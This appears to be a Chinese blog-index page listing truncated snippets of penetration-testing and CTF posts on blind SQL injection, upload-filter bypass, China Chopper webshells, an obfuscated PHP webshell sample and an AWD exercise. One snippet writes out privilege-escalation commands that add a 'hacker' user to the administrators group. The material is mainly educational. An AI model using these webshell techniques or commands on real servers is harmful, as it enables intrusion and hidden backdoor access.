SQL注入--布尔盲注 布尔盲注:页面只返回True和False两种类型页面。利用页面返回不同,逐个猜解数据 sql注入操作步骤1.判断是否存在注入(判断是否未严格校验)--第一要素1)可控参数的改变能否影响页面的显示结果2)输入的sql语句是否能够报错,通过数据库的报错我们可以看到数据库的一些语句 ...
分类:
数据库 时间:
2020-01-29 18:19:32
阅读次数:
95
less-46 前置基础知识: select * from users order by 1 desc ;使用降序(倒序)排列 select * from users order by 1 asc ;使用升序(正序)排列 select right(database(),1);从右至左输出第一个字母 ...
分类:
数据库 时间:
2020-01-28 23:28:53
阅读次数:
104
打开之后是是一个上传页面 第一想法上传一句话木马,使用菜刀连接 但是只能上传图片 查看源码 Array.prototype.contains = function (obj) { var i = this.length; while (i--) { if (this[i] obj) { return ...
分类:
其他好文 时间:
2020-01-28 17:21:48
阅读次数:
213
在注入成功后,登入后台管理,上传一句话,菜刀连接 上传3389,pr,cmd 打开虚拟终端 并且切换到上传目录下, 执行pr命令,pr “net user hacker 123 /add”,添加用户让后给用户管理员权限,pr “net localgroup administrators hacker ...
分类:
其他好文 时间:
2020-01-18 01:08:13
阅读次数:
64
中国菜刀的由来: 说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了C++/J2ME/PHP/JSP/ASP.NET等等十数种计算机语言,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页 ...
分类:
其他好文 时间:
2020-01-05 11:45:56
阅读次数:
444
[其它]xise菜刀下载,集中国菜刀为一体的xise工具 https://bbs.ichunqiu.com/thread-55286-1-1.html 安全工具 需要仔细学习呢. 手机用户4S20Y9i春秋-呆萌菜鸟 发表于 6 天前4931 XISE WBMS V23.8整合更新功能如下:·生成内 ...
分类:
其他好文 时间:
2020-01-04 01:19:19
阅读次数:
109
进去提示有提示文件包含漏洞 拿到源码发现这里上传验证只有MIME验证 可直接抓包改 image/gif 绕过 接下来就是这次学到的点了 菜刀连接过后怎么都找不到flag文件,但是这里找到了数据库配置文件 这里显示了服务器名 和 用户名和密码还有数据库名 这里猜想答案应该在数据库里,然后直接编辑 T ...
分类:
其他好文 时间:
2019-11-24 19:23:22
阅读次数:
87
WebShell代码分析溯源(四) 一、一句话变形马样本 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").(" ...
分类:
Web程序 时间:
2019-10-31 13:27:58
阅读次数:
147
北极星杯 awd复现 服务器共有3个web和一个pwn web1 1,down下web1的源码,使用D盾扫描: 2,漏洞1:发现三个冰蝎的木马,和一个一句话木马 冰蝎的后门需要使用冰蝎的客户端进行连接:如图: 一句话木马直接使用菜刀或蚁剑连接即可: 3,漏洞2:sqlhelper.php的反序列化漏 ...
分类:
其他好文 时间:
2019-10-26 01:43:55
阅读次数:
194
1. PHP基础 ①eval(字符串)函数:把字符串按照PHP代码执行,该字符串必须是合法的PHP代码,且以分号结尾: ②assert()函数:如果参数是字符串,它将会被assert()当做PHP代码来执行,跟eval()类似: ③system()函数,执行外部程序,并且显示输出: ④exec()函 ...
分类:
Web程序 时间:
2019-10-06 16:30:36
阅读次数:
139
